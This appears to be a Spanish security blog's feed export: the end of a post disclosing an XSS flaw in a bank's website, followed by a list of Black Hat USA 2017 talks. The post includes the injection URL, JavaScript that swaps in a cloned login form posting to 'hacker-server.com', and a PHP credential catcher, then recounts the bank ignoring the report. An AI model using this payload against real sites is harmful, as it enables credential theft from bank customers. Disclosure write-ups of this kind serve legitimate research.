&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr51RBWEzW5lR_pj6DvAPoB-enOpNuod0F4UGU_EWhfWEoYMJOFhx8CmuthuRsTM57USB1taTeWhkm-9ZsGkIFjTkt-ETgJm0OPxLvL2Am1xIVRo8gHqGC7INZ2qVc0gRn9JED5_6weIXi/s1600/2_xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="717" data-original-width="1118" height="410" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr51RBWEzW5lR_pj6DvAPoB-enOpNuod0F4UGU_EWhfWEoYMJOFhx8CmuthuRsTM57USB1taTeWhkm-9ZsGkIFjTkt-ETgJm0OPxLvL2Am1xIVRo8gHqGC7INZ2qVc0gRn9JED5_6weIXi/s640/2_xss.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;Dos de los ataques más comunes que se pueden hacer para sacar provecho de un XSS, es el &lt;b&gt;robo de cookies&lt;/b&gt; de sesión y la &lt;b&gt;suplantación de formularios de acceso &lt;/b&gt;(usuario/contraseña). El robo de cookies no será efectivo ya que el Banco tiene un sistema de sesiones únicas por ende la cookie sólo sirve para recibir un mensaje de error, por tanto decido una suplantación de formularios de acceso. &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&amp;nbsp;La forma más fácil de hacer esto es inyectando un código javascript que borre todo el contenido en la página web legítima y ponga los formularios para mandar las credenciales a un servidor que controle el atacante.&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;https://www.banco.xxx/ruta/script.aspx?Id=97"&amp;gt;&amp;lt;script type="text/javascript" src="http://yourjavascript.com/000000/a.js"&amp;gt;&amp;lt;/script&amp;gt;
o
https://www.banco.xxx/ruta/script.aspx?Id=97%22%3E%3Cscript%20type=%22text/javascript%22%20src=%22http://yourjavascript.com/000000/a.js%22%3E%3C/script%3E&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&amp;nbsp;El javascript es muy sencillo y su sintaxis es esta:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;var html = `
&amp;lt;html&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;h1&amp;gt;Página web del Banco&amp;lt;/h1&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;marquee&amp;gt;El banco más seguro del mundo.&amp;lt;/marquee&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
`;

document.body.innerHTML = html;&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&amp;nbsp;Dentro de &lt;i&gt;&lt;b&gt;var html = `&amp;lt;!-code here-&amp;gt;`;&lt;/b&gt;&lt;/i&gt; se copia y pega el código de la página web de acceso del sitio web légitimo, se debe cambiar las rutas relativas agregando la url de la web original:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;De: &amp;lt;link rel="stylesheet" type="text/css" href="/login/assets/style.css"&amp;gt;
A:  &amp;lt;link rel="stylesheet" type="text/css" href="https://www.banco.xxx/login/assets/style.css"&amp;gt;&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
Por último y más importante, se debe reemplazar el &lt;i&gt;action&lt;/i&gt; del formulario a un script en PHP que guarde las credenciales en un servidor controlado por el atacante:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;De: &amp;lt;form action="/login.php" method="post"&amp;gt;
A:  &amp;lt;form action="https://hacker-server.com/pass.php" method="post"&amp;gt;&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&amp;nbsp;Se puede ir viendo como queda el resultado apretando &lt;b&gt;F12&lt;/b&gt; en cualquier web y pegando el código en la consola javascript:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqTMMSWrNI67ZuzEHkg858BgdINz09YlF0H_hErEYsOhjGkIrsHGpKi2INucByyShGdhyphenhyphencY8yHxE_p9D7FbZ-Ok3U1E2dkz3nP9EiIqxpBMVAI_0gQg2w5FY-Ed8veJQA88RP6mLeoe7TK/s1600/04_javascript_consola.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="378" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqTMMSWrNI67ZuzEHkg858BgdINz09YlF0H_hErEYsOhjGkIrsHGpKi2INucByyShGdhyphenhyphencY8yHxE_p9D7FbZ-Ok3U1E2dkz3nP9EiIqxpBMVAI_0gQg2w5FY-Ed8veJQA88RP6mLeoe7TK/s1600/04_javascript_consola.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;Como es una prueba de concepto para mandar un reporte con la vulnerabilidad, el script en PHP que intercepta las credenciales simplemente será un script que muestre los parámetros POST en pantalla:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
echo "&amp;lt;pre&amp;gt;";
print_r($_POST);
echo "&amp;lt;/pre&amp;gt;";
?&amp;gt;&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&amp;nbsp;Ya todo está listo y el PoC funciona perfecto:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPuIOTsuYBEcXTxsR3bXB4bKWWR8Qk5vWtIH4-B2ernILz2FoK1nt8BbIginphDAVyMZKUNJRdYFYY4JekkSr54NGtPlnawxFklKv5wJb2empf5ZpoTKVztlZ2FgQsA8SvLyKkLJ874N75/s1600/3_xss_funcional.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="840" data-original-width="1506" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPuIOTsuYBEcXTxsR3bXB4bKWWR8Qk5vWtIH4-B2ernILz2FoK1nt8BbIginphDAVyMZKUNJRdYFYY4JekkSr54NGtPlnawxFklKv5wJb2empf5ZpoTKVztlZ2FgQsA8SvLyKkLJ874N75/s640/3_xss_funcional.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;Y cuando ingresan sus credenciales se envían al servidor del atacante: &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDNJ8pCZrrSdqheDdTM2kATBOlP_3N8JebfA0pYgVPW3Nk09TnU3N5cvYPaoYmqxQ8QxS9nO6rMnpAtrVdiuIt_RGpTO5s3IJdf4zgIcYINYPO5f70SOv7lRm-7iF-KbiZazP15Tg4oIwv/s1600/4_post_password.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="227" data-original-width="504" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDNJ8pCZrrSdqheDdTM2kATBOlP_3N8JebfA0pYgVPW3Nk09TnU3N5cvYPaoYmqxQ8QxS9nO6rMnpAtrVdiuIt_RGpTO5s3IJdf4zgIcYINYPO5f70SOv7lRm-7iF-KbiZazP15Tg4oIwv/s1600/4_post_password.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;&lt;b&gt;Envío del reporte y respuestas&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Una vez con el reporte listo y con el PoC funcionando intento buscar alguna forma de contactarme con el Banco para enviárselo... No encuentro nada, así que uso una herramienta llamada &lt;a href="https://www.kitploit.com/2018/02/contactsh-osint-tool-to-find-contacts.html" target="_blank"&gt;&lt;b&gt;contact.sh&lt;/b&gt;&lt;/a&gt; que es un script que intenta varios métodos y convenciones para encontrar al encargado de un sitio web... Y nada nuevamente, así que me digno a escribirles a través de Twitter y me responden diciendo que escriba a un correo que me dieron.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Escribo al correo proporcionado y no me responden en varios días, ni siquiera un "Recibido, muchas gracias", así que de nuevo pido a través de Twitter algún mail para poder enviar el reporte.... YYY, visto!&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmSqvt8iO_ZFSx2_Ywj35RwvEy-a3Z6jrU73fBQH8jfmBgvUvJe8qjU_C4Wmj2Q8NucYwajAkUxqBdhJeDnpg2J6pUt1luKMOjuG1OmEXCXBHfIiJdgfmJWoJesbnfCJaHzZuOCJlvmMI6/s1600/5_twitter_sin_respuesta.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="568" data-original-width="621" height="365" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmSqvt8iO_ZFSx2_Ywj35RwvEy-a3Z6jrU73fBQH8jfmBgvUvJe8qjU_C4Wmj2Q8NucYwajAkUxqBdhJeDnpg2J6pUt1luKMOjuG1OmEXCXBHfIiJdgfmJWoJesbnfCJaHzZuOCJlvmMI6/s400/5_twitter_sin_respuesta.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;A la semana me llega un mail:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6TPdLEXFoz_QplsqtGlmJgmygQm4XmMRbxmtsO26EQFkfNQfkGkDP_5SUZx2us_GLnWclhejfTQeQklExD9kUF40XfIyFGEbH0vtCtWtTm2NdYey4sf-93hzT_mUaIvHchlP0mPUdpg0X/s1600/6_mail_ejecutivo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="180" data-original-width="756" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6TPdLEXFoz_QplsqtGlmJgmygQm4XmMRbxmtsO26EQFkfNQfkGkDP_5SUZx2us_GLnWclhejfTQeQklExD9kUF40XfIyFGEbH0vtCtWtTm2NdYey4sf-93hzT_mUaIvHchlP0mPUdpg0X/s640/6_mail_ejecutivo.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Como pueden ver me mandaron el mail de un especialista en marketing y clientes, y no el de un especialista en seguridad, probablemente esas dos áreas estén muy separadas dentro del Banco y ni si quiera se comuniquen, así que el reporte de seguridad quedó archivado como un reclamo de cliente... &lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Y un día después del mail me llaman:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Yo: &lt;/b&gt;Alo?&lt;br /&gt;
&lt;b&gt;Telefonista: &lt;/b&gt;Hola, llamamos del Banco X para informarte que tu reclamo fue derivado al área que corresponde.&amp;nbsp; &lt;br /&gt;
&lt;b&gt;Yo: &lt;/b&gt;No es un reclamo, es un reporte de seguridad. A qué área lo derivaron?&lt;br /&gt;
&lt;b&gt;Telefonista: &lt;/b&gt;No lo sé, nosotros somos el área de clientes, pero te van a contactar!&lt;br /&gt;
&lt;b&gt;Yo:&lt;/b&gt; Ok! Gracias por la información, Adiós!....... Espera, tienen Bug Bounty?&lt;br /&gt;
&lt;b&gt;Telefonista: &lt;/b&gt;[Cuelga]&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&amp;nbsp;Hasta el día de hoy, nadie me ha contactado y las vulnerabilidades se mantienen exactamente como el primer día que las reporté. Ya pasó más de un mes y al parecer no hay intención de arreglarlo, así que me decidí a escribir este post.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;&lt;b&gt;Conclusiones&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Los XSS son vulnerabilidades que tienen un impacto bajo hoy en día, el ataque que mostré arriba, solo puede ser replicado en Firefox ya que todos los demás browsers bloquean los posibles XSS, eso no exime de responsabilidades a los encargados de seguridad. Como pueden ver también el Banco no tiene protocolos para reportar bugs y mucho menos un programa de Bug Bounty. La situación es peor ya que investigando un poco más, el Banco terceriza el desarrollo de aplicaciones (contrata una empresa externa para que las haga), eso en muchos casos es útil, pero en un Banco que maneja datos sensibles de clientes no debería tener permitido traspasar datos a empresas externas, menos delegar la seguridad a ellos. Hay que notar también que las tecnologías usadas para el desarrollo de aplicaciones bancarias ya están obsoletas y los problemas presentados anteriormente son en gran medida por usar Frameworks anticuados que no validan como corresponden los inputs y malas configuraciones.&lt;br /&gt;
&lt;br /&gt;
Las pruebas de concepto que se presentan arriba fueron realizadas con la finalidad de demostrar el impacto que pueden tener y en ningún momento fueron usadas con otra finalidad.&lt;br /&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[!] Zion3R&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl2I1GmakJYZopMi2ZoIcdK-X3JA0f4sOCvv_HAOaJbrpU8tJpIRvoA8LKjLeW-rywEOgf8HiaufBWSVaqxzH7ImdAPTqrgCuA3_JMDxLEVHrXEOxQwaEXIlXgc-uvulus6BERkHr82ME1/s72-c/bank_hacked.png" width="72"/></item><item><title>Presentaciones de Black Hat USA 2017 (PDF)</title><link>http://www.blackploit.com/2017/08/presentaciones-de-black-hat-usa-2017-pdf.html</link><category>Black Hat</category><category>Conference</category><category>Paper</category><category>Presentaciones</category><category>Seguridad</category><category>Seguridad Web</category><category>Textos</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Sat, 5 Aug 2017 14:01:00 -0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-7050928496989335859</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxgmovJGCe7INep7Nfh8eHYyHck5EYxJD1szgZkTRKG6TU5VkfIF7PLCqjUOGC0_VEBjiWYesL5zc6Es4I6l_fcx4eHHW5hg8uVMCbyYlYNp-tCDWfSEw94mfTASbgKgAIGi_KiYd9ioO8/s1600/black-hat-usa-2017.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="960" data-original-width="1600" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxgmovJGCe7INep7Nfh8eHYyHck5EYxJD1szgZkTRKG6TU5VkfIF7PLCqjUOGC0_VEBjiWYesL5zc6Es4I6l_fcx4eHHW5hg8uVMCbyYlYNp-tCDWfSEw94mfTASbgKgAIGi_KiYd9ioO8/s640/black-hat-usa-2017.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
La semana pasada publiqué una entrada con las &lt;a href="https://www.blackploit.com/2017/07/presentaciones-de-la-def-con-25-pdf.html" target="_blank"&gt;presentaciones de la DEF CON 25&lt;/a&gt; y está vez es la oportunidad de las presentaciones de &lt;b&gt;Black Hat USA 2017&lt;/b&gt;, sin duda es un material de primera y recomiendo que vean al menos las presentaciones que les llamen la atención:&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;Stepping Up Our Game: Re-focusing the Security Community on Defense and Making Security Work for Everyone&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;‘Ghost Telephonist’ Link Hijack Exploitations in 4G LTE CS Fallback

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Yuwei-Ghost-Telephonist-Link-Hijack-Exploitations-In-4G-LTE-CS-Fallback.pdf"&gt;Yuwei-Ghost-Telephonist-Link-Hijack-Exploitations-In-4G-LTE-CS-Fallback.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;(in)Security in Building Automation: How to Create Dark Buildings with Light Speed

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Brandstetter-insecurity-In-Building-Automation-How-To-Create-Dark-Buildings-With-Light-Speed.pdf"&gt;Brandstetter-insecurity-In-Building-Automation-How-To-Create-Dark-Buildings-With-Light-Speed.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Brandstetter-insecurity-In-Building-Automation-How-To-Create-Dark-Buildings-With-Light-Speed-wp.pdf"&gt;Brandstetter-insecurity-In-Building-Automation-How-To-Create-Dark-Buildings-With-Light-Speed-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf"&gt;Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Advanced Pre-Breach Planning: Utilizing a Purple Team to Measure Effectiveness vs. Maturity&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Adventures in Attacking Wind Farm Control Networks

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Staggs-Adventures-In-Attacking-Wind-Farm-Control-Networks.pdf"&gt;Staggs-Adventures-In-Attacking-Wind-Farm-Control-Networks.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;All Your SMS &amp;amp; Contacts Belong to ADUPS &amp;amp; Others

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Johnson-All-Your-SMS-&amp;amp;-Contacts-Belong-To-Adups-&amp;amp;-Others.pdf"&gt;Johnson-All-Your-SMS-&amp;amp;-Contacts-Belong-To-Adups-&amp;amp;-Others.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Johnson-All-Your-SMS-&amp;amp;-Contacts-Belong-To-Adups-&amp;amp;-Others-wp.pdf"&gt;Johnson-All-Your-SMS-&amp;amp;-Contacts-Belong-To-Adups-&amp;amp;-Others-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;An ACE Up the Sleeve: Designing Active Directory DACL Backdoors

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Robbins-An-ACE-Up-The-Sleeve-Designing-Active-Directory-DACL-Backdoors.pdf"&gt;Robbins-An-ACE-Up-The-Sleeve-Designing-Active-Directory-DACL-Backdoors.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Robbins-An-ACE-Up-The-Sleeve-Designing-Active-Directory-DACL-Backdoors-wp.pdf"&gt;Robbins-An-ACE-Up-The-Sleeve-Designing-Active-Directory-DACL-Backdoors-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;And Then the Script-Kiddie Said Let There be No Light. Are Cyber-Attacks on the Power Grid Limited to Nation-State Actors?

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Keliris-And-Then-The-Script-Kiddie-Said-Let-There-Be-No-Light-Are-Cyberattacks-On-The-Power-Grid-Limited-To-Nation-State-Actors-wp.pdf"&gt;Keliris-And-Then-The-Script-Kiddie-Said-Let-There-Be-No-Light-Are-Cyberattacks-On-The-Power-Grid-Limited-To-Nation-State-Actors-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Attacking Encrypted USB Keys the Hard(ware) Way&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Automated Detection of Vulnerabilities in Black-Box Routers (and Other Network Devices)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Automated Testing of Crypto Software Using Differential Fuzzing

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Aumasson-Automated-Testing-Of-Crypto-Software-Using-Differential-Fuzzing.pdf"&gt;Aumasson-Automated-Testing-Of-Crypto-Software-Using-Differential-Fuzzing.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;AVPASS: Leaking and Bypassing Antivirus Detection Model Automatically

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Jung-AVPASS-Leaking-And-Bypassing-Anitvirus-Detection-Model-Automatically.pdf"&gt;Jung-AVPASS-Leaking-And-Bypassing-Anitvirus-Detection-Model-Automatically.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Behind the Plexiglass Curtain: Stats and Stories from the Black Hat NOC&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Betraying the BIOS: Where the Guardians of the BIOS are Failing

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Branco-Firmware-Is-The-New-Black-Analyzing-Past-Three-Years-Of-BIOS-UEFI-Security-Vulnerabilities"&gt;Branco-Firmware-Is-The-New-Black-Analyzing-Past-Three-Years-Of-BIOS-UEFI-Security-Vulnerabilities&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Big Game Theory Hunting: The Peculiarities of Human Behavior in the InfoSec Game

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Shortridge-Big-Game-Theory-Hunting-The-Peculiarities-Of-Human-Behavior-In-The-Infosec-Game.pdf"&gt;Shortridge-Big-Game-Theory-Hunting-The-Peculiarities-Of-Human-Behavior-In-The-Infosec-Game.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Blue Pill for Your Phone&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Bochspwn Reloaded: Detecting Kernel Memory Disclosure with x86 Emulation and Taint Tracking

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Jurczyk-Bochspwn-Reloaded-Detecting-Kernel-Memory-Disclosure-With-X86-Emulation-And-Taint-Tracking.pdf"&gt;Jurczyk-Bochspwn-Reloaded-Detecting-Kernel-Memory-Disclosure-With-X86-Emulation-And-Taint-Tracking.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Bot vs. Bot for Evading Machine Learning Malware Detection

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Anderson-Bot-Vs-Bot-Evading-Machine-Learning-Malware-Detection.pdf"&gt;Anderson-Bot-Vs-Bot-Evading-Machine-Learning-Malware-Detection.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Anderson-Bot-Vs-Bot-Evading-Machine-Learning-Malware-Detection-wp.pdf"&gt;Anderson-Bot-Vs-Bot-Evading-Machine-Learning-Malware-Detection-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Break&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Breakfast (Sponsored by FireEye McAfee Qualys &amp;amp; Tenable Network Security)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Breaking Electronic Door Locks Like You’re on CSI: Cyber

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-OFlynn-Breaking-Electronic-Locks.pdf"&gt;OFlynn-Breaking-Electronic-Locks.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Breaking the Laws of Robotics: Attacking Industrial Robots

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Quarta-Breaking-The-Laws-Of-Robotics-Attacking-Industrial-Robots.pdf"&gt;Quarta-Breaking-The-Laws-Of-Robotics-Attacking-Industrial-Robots.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Quarta-Breaking-The-Laws-Of-Robotics-Attacking-Industrial-Robots-wp.pdf"&gt;Quarta-Breaking-The-Laws-Of-Robotics-Attacking-Industrial-Robots-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Breaking the x86 Instruction Set

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Domas-Breaking-The-x86-ISA.pdf"&gt;Domas-Breaking-The-x86-ISA.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Domas-Breaking-The-x86-Instruction-Set-wp.pdf"&gt;Domas-Breaking-The-x86-Instruction-Set-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Broadpwn: Remotely Compromising Android and iOS via a Bug in Broadcom’s Wi-Fi Chipsets&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Bug Collisions Meet Government Vulnerability Disclosure

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Ablon-Bug-Collisions-Meet-Government-Vulnerability-Disclosure-Zero-Days-Thousands-Of-Nights-RAND.pdf"&gt;Ablon-Bug-Collisions-Meet-Government-Vulnerability-Disclosure-Zero-Days-Thousands-Of-Nights-RAND.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Herr-Bug-Collisions-Meet-Government-Vulnerability-Disclosure-Taking%20Stock%20-%20Vulnerability-Rediscovery-HKS.pdf"&gt;Herr-Bug-Collisions-Meet-Government-Vulnerability-Disclosure-Taking Stock - Vulnerability-Rediscovery-HKS.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Business Hall Welcome Reception (Sponsored by Forcepoint McAfee LogRhythm &amp;amp; Tenable Network Security)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Challenges of Cooperation Across Cyberspace&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Champagne Toast (Sponsored by ESET North America Fidelis 
Cybersecurity Fortinet Leidos Palo Alto Networks Raytheon &amp;amp; 
Symantec)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Cloak &amp;amp; Dagger: From Two Permissions to Complete Control of the UI Feedback Loop

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Fratantonio-Cloak-And-Dagger-From-Two-Permissions-To-Complete-Control-Of-The-UI-Feedback-Loop.pdf"&gt;Fratantonio-Cloak-And-Dagger-From-Two-Permissions-To-Complete-Control-Of-The-UI-Feedback-Loop.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Fratantonio-Cloak-And-Dagger-From-Two-Permissions-To-Complete-Control-Of-The-UI-Feedback-Loop-wp.pdf"&gt;Fratantonio-Cloak-And-Dagger-From-Two-Permissions-To-Complete-Control-Of-The-UI-Feedback-Loop-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Coffee Service&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Kettle-Cracking-The-Lens-Exploiting-HTTPs-Hidden-Attack-Surface.pdf"&gt;Kettle-Cracking-The-Lens-Exploiting-HTTPs-Hidden-Attack-Surface.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Kettle-Cracking-The-Lens-Exploiting-HTTPs-Hidden-Attack-Surface-wp.pdf"&gt;Kettle-Cracking-The-Lens-Exploiting-HTTPs-Hidden-Attack-Surface-wp.pdf&lt;/a&gt;&lt;/li&gt;
